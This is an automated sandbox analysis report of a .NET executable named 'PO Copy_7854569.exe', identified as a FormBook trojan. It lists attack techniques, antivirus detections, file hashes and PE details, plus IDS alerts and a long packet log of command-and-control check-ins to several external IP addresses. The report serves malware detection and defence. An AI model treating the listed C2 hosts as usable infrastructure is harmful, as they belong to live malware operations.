            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 21 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 1 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
            [Behavior graph: ID 1446507, sample PO Copy_7854569.exe, start date 23/05/2024, architecture WINDOWS, score 100]

            Source | Detection | Scanner | Label
            PO Copy_7854569.exe | 46% | Virustotal |
            PO Copy_7854569.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.Taskun
            PO Copy_7854569.exe | 100% | Avira | TR/AD.Swotter.xdjgl
            PO Copy_7854569.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
                          Joe Sandbox version: 40.0.0 Tourmaline
                          Analysis ID: 1446507
                          Start date and time: 2024-05-23 15:15:07 +02:00
                          Joe Sandbox product: CloudBasic
                          Overall analysis duration: 0h 11m 39s
                          Hypervisor based Inspection enabled: false
                          Report type: full
                          Cookbook file name: default.jbs
                          Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed: 12
                          Number of new started drivers analysed: 0
                          Number of existing processes analysed: 0
                          Number of existing drivers analysed: 0
                          Number of injected processes analysed: 2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode: default
                          Analysis stop reason: Timeout
                          Sample name: PO Copy_7854569.exe
                          Detection: MAL
                          Classification: mal100.troj.spyw.evad.winEXE@12/7@23/10
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 118
                          • Number of non-executed functions: 314
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target sXAKgqpSAiGEzhyDsUSKBxPWz.exe, PID 7128 because it is empty
                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          Time | Type | Description
                          09:15:51 | API Interceptor | 1x Sleep call for process: PO Copy_7854569.exe modified
                          09:15:53 | API Interceptor | 11x Sleep call for process: powershell.exe modified
                          09:16:44 | API Interceptor | 11423051x Sleep call for process: openfiles.exe modified
                          No context
                          No context
                          Process:C:\Users\user\Desktop\PO Copy_7854569.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1172
                          Entropy (8bit):5.354777075714867
                          Encrypted:false
                          SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                          MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                          SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                          SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                          SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                          Process:C:\Windows\SysWOW64\openfiles.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                          Category:dropped
                          Size (bytes):196608
                          Entropy (8bit):1.121297215059106
                          Encrypted:false
                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                          MD5:D87270D0039ED3A5A72E7082EA71E305
                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                          Malicious:false
                          Reputation:high, very likely benign file
                          Preview:SQLite format 3
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.957781744980178
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:PO Copy_7854569.exe
                          File size:715'264 bytes
                          MD5:1a446464ce98784973a5e7bd13190a5b
                          SHA1:d4a5f07d3259338ec8ac7c84dc387dd0ea581b6b
                          SHA256:dcda4d5b1eba2327c178aad5f4237e22934841cd6d7ad116c2cb1622d6e9673b
                          SHA512:cb39b7dbcac0f6d1319ea70a589add07be9f2911e255dc21bb8364dfd36143283c8dacc444515ad0184d5bba2cdb37180d4325f57d7fa90060620292b0824783
                          SSDEEP:12288:e5dxtiqsXrn+yqXRYhJ6rRz4NxufdfwVfZohEViROrEn1FMG:e5pbsXrnowHdZohEAKED
                          TLSH:7EE4231AB3B594B3CC3E9BB904754276937269933733FA496EC900FA1CE3709CA44997
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Mf................................. ........@.. .......................@............@................................
                          Icon Hash:c04e363636261032
                          Entrypoint:0x4af51e
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x664DBAB3 [Wed May 22 09:28:19 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaf4c4 | 0x57 | .text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x1000 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x2000 | 0xad524 | 0xad600 | facc1187ad79d0ac35824244416c2a38 | False | 0.9701173283165104 | data | 7.965905089311066 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc | 0xb0000 | 0x1000 | 0x1000 | 5a6f5f7dd7810df3a932b753842f66ce | False | 0.64794921875 | data | 5.905399762407496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0xb2000 | 0xc | 0x200 | bfdcfd61ea2ceb2b5a0981427b1985b7 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0xb0100 | 0x7f0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9281496062992126
                          RT_GROUP_ICON | 0xb0900 | 0x14 | data | | | 1.05
                          RT_VERSION | 0xb0924 | 0x344 | data | | | 0.4342105263157895
                          RT_MANIFEST | 0xb0c78 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                          DLL | Import
                          mscoree.dll | _CorExeMain
                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                          05/23/24-15:17:32.170290 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 53661 | 80 | 192.168.2.5 | 162.0.237.22
                          05/23/24-15:16:50.015697 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 53652 | 80 | 192.168.2.5 | 103.247.10.164
                          05/23/24-15:17:18.761145 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 53657 | 80 | 192.168.2.5 | 162.240.81.18
                          05/23/24-15:17:46.447712 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 53665 | 80 | 192.168.2.5 | 84.32.84.32
                          05/23/24-15:17:10.469533 | TCP | 2856318 | ETPRO TROJAN FormBook CnC Checkin (POST) M4 | 53654 | 80 | 192.168.2.5 | 162.240.81.18
                          TimestampSource PortDest PortSource IPDest IP
                          May 23, 2024 15:17:13.611696959 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.612622976 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.612680912 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:13.617400885 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.617435932 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.617469072 CEST8053655162.240.81.18192.168.2.5
                          May 23, 2024 15:17:13.617527962 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:13.617567062 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:14.546577930 CEST5365580192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.206701994 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.211874962 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.211963892 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.224153996 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.229216099 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.279483080 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.787184954 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.789999008 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.790076971 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.792588949 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.792620897 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.793039083 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.845016003 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.890518904 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.893343925 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.893388987 CEST8053656162.240.81.18192.168.2.5
                          May 23, 2024 15:17:16.893438101 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:16.893438101 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:17.734412909 CEST5365680192.168.2.5162.240.81.18
                          May 23, 2024 15:17:18.752377033 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:18.758349895 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:18.759285927 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:18.761145115 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:18.774897099 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:19.336457968 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:19.337523937 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:19.338501930 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:19.341311932 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:19.341347933 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:19.341381073 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:19.341485023 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:19.341485023 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:19.343751907 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:19.392522097 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:19.392586946 CEST5365780192.168.2.5162.240.81.18
                          May 23, 2024 15:17:19.401097059 CEST8053657162.240.81.18192.168.2.5
                          May 23, 2024 15:17:24.399394035 CEST5365880192.168.2.5162.0.237.22
                          May 23, 2024 15:17:24.408126116 CEST8053658162.0.237.22192.168.2.5
                          May 23, 2024 15:17:24.409324884 CEST5365880192.168.2.5162.0.237.22
                          May 23, 2024 15:17:24.415113926 CEST5365880192.168.2.5162.0.237.22
                          May 23, 2024 15:17:24.460782051 CEST8053658162.0.237.22192.168.2.5
                          May 23, 2024 15:17:25.002605915 CEST8053658162.0.237.22192.168.2.5
                          May 23, 2024 15:17:25.007323027 CEST8053658162.0.237.22192.168.2.5
                          May 23, 2024 15:17:25.009217978 CEST5365880192.168.2.5162.0.237.22
                          May 23, 2024 15:17:25.921392918 CEST5365880192.168.2.5162.0.237.22
                          May 23, 2024 15:17:26.942595959 CEST5365980192.168.2.5162.0.237.22
                          May 23, 2024 15:17:26.947813988 CEST8053659162.0.237.22192.168.2.5
                          May 23, 2024 15:17:26.948046923 CEST5365980192.168.2.5162.0.237.22
                          May 23, 2024 15:17:26.949980974 CEST5365980192.168.2.5162.0.237.22
                          May 23, 2024 15:17:27.000432968 CEST8053659162.0.237.22192.168.2.5
                          May 23, 2024 15:17:27.610160112 CEST8053659162.0.237.22192.168.2.5
                          May 23, 2024 15:17:27.617451906 CEST8053659162.0.237.22192.168.2.5
                          May 23, 2024 15:17:27.617672920 CEST5365980192.168.2.5162.0.237.22
                          May 23, 2024 15:17:28.452754974 CEST5365980192.168.2.5162.0.237.22
                          May 23, 2024 15:17:29.470679045 CEST5366080192.168.2.5162.0.237.22
                          May 23, 2024 15:17:29.481256008 CEST8053660162.0.237.22192.168.2.5
                          May 23, 2024 15:17:29.482594013 CEST5366080192.168.2.5162.0.237.22
                          May 23, 2024 15:17:29.484458923 CEST5366080192.168.2.5162.0.237.22
                          May 23, 2024 15:17:29.493462086 CEST8053660162.0.237.22192.168.2.5
                          May 23, 2024 15:17:29.540700912 CEST8053660162.0.237.22192.168.2.5
                          May 23, 2024 15:17:30.074572086 CEST8053660162.0.237.22192.168.2.5
                          May 23, 2024 15:17:30.079312086 CEST8053660162.0.237.22192.168.2.5
                          May 23, 2024 15:17:30.079384089 CEST5366080192.168.2.5162.0.237.22
                          May 23, 2024 15:17:31.001280069 CEST5366080192.168.2.5162.0.237.22
                          May 23, 2024 15:17:32.161822081 CEST5366180192.168.2.5162.0.237.22
                          May 23, 2024 15:17:32.167973042 CEST8053661162.0.237.22192.168.2.5
                          May 23, 2024 15:17:32.168065071 CEST5366180192.168.2.5162.0.237.22
                          May 23, 2024 15:17:32.170289993 CEST5366180192.168.2.5162.0.237.22
                          May 23, 2024 15:17:32.220624924 CEST8053661162.0.237.22192.168.2.5
                          May 23, 2024 15:17:32.796171904 CEST8053661162.0.237.22192.168.2.5
                          May 23, 2024 15:17:32.800904036 CEST8053661162.0.237.22192.168.2.5
                          May 23, 2024 15:17:32.802100897 CEST5366180192.168.2.5162.0.237.22
                          May 23, 2024 15:17:33.780322075 CEST5366180192.168.2.5162.0.237.22
                          May 23, 2024 15:17:33.785615921 CEST8053661162.0.237.22192.168.2.5
                          May 23, 2024 15:17:38.841525078 CEST5366280192.168.2.584.32.84.32
                          May 23, 2024 15:17:38.846667051 CEST805366284.32.84.32192.168.2.5
                          May 23, 2024 15:17:38.847095013 CEST5366280192.168.2.584.32.84.32
                          May 23, 2024 15:17:38.848829985 CEST5366280192.168.2.584.32.84.32
                          May 23, 2024 15:17:38.906253099 CEST805366284.32.84.32192.168.2.5
                          May 23, 2024 15:17:39.456767082 CEST805366284.32.84.32192.168.2.5
                          May 23, 2024 15:17:39.456849098 CEST5366280192.168.2.584.32.84.32
                          May 23, 2024 15:17:40.358895063 CEST5366280192.168.2.584.32.84.32
                          May 23, 2024 15:17:40.363970041 CEST805366284.32.84.32192.168.2.5
                          May 23, 2024 15:17:41.378559113 CEST5366380192.168.2.584.32.84.32
                          May 23, 2024 15:17:41.383635998 CEST805366384.32.84.32192.168.2.5
                          May 23, 2024 15:17:41.385505915 CEST5366380192.168.2.584.32.84.32
                          May 23, 2024 15:17:41.385505915 CEST5366380192.168.2.584.32.84.32
                          May 23, 2024 15:17:41.436409950 CEST805366384.32.84.32192.168.2.5
                          May 23, 2024 15:17:41.905535936 CEST805366384.32.84.32192.168.2.5
                          May 23, 2024 15:17:41.905603886 CEST5366380192.168.2.584.32.84.32
                          May 23, 2024 15:17:42.891124964 CEST5366380192.168.2.584.32.84.32
                          May 23, 2024 15:17:42.896243095 CEST805366384.32.84.32192.168.2.5
                          May 23, 2024 15:17:43.909276962 CEST5366480192.168.2.584.32.84.32
                          May 23, 2024 15:17:43.916138887 CEST805366484.32.84.32192.168.2.5
                          May 23, 2024 15:17:43.916229010 CEST5366480192.168.2.584.32.84.32
                          May 23, 2024 15:17:43.918405056 CEST5366480192.168.2.584.32.84.32
                          May 23, 2024 15:17:43.923563004 CEST805366484.32.84.32192.168.2.5
                          May 23, 2024 15:17:43.971365929 CEST805366484.32.84.32192.168.2.5
                          May 23, 2024 15:17:44.372539043 CEST805366484.32.84.32192.168.2.5
                          May 23, 2024 15:17:44.373255968 CEST5366480192.168.2.584.32.84.32
                          May 23, 2024 15:17:45.421423912 CEST5366480192.168.2.584.32.84.32
                          May 23, 2024 15:17:45.427244902 CEST805366484.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.440262079 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.445519924 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.445628881 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.447711945 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.503262043 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.911876917 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.913451910 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.913497925 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.917015076 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.920737982 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.920758963 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.920783043 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.927788973 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.927853107 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.930634022 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.930655003 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.930672884 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.930685997 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.930788040 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.933454037 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.939608097 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:46.939723015 CEST5366580192.168.2.584.32.84.32
                          May 23, 2024 15:17:46.944472075 CEST805366584.32.84.32192.168.2.5
                          May 23, 2024 15:17:51.998833895 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.005820990 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.006213903 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.007811069 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.056461096 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.631057978 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.635495901 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.635632038 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.640237093 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.640373945 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.640383005 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.640388966 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.640408993 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.645091057 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.647674084 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.647680044 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.647797108 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.651210070 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.651217937 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.651266098 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.655517101 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.655524015 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.655658960 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.694916010 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.695028067 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.728416920 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.730029106 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.730093956 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.732153893 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.732166052 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.732176065 CEST805366663.250.43.147192.168.2.5
                          May 23, 2024 15:17:52.732217073 CEST5366680192.168.2.563.250.43.147
                          May 23, 2024 15:17:52.736732006 CEST805366663.250.43.147192.168.2.5
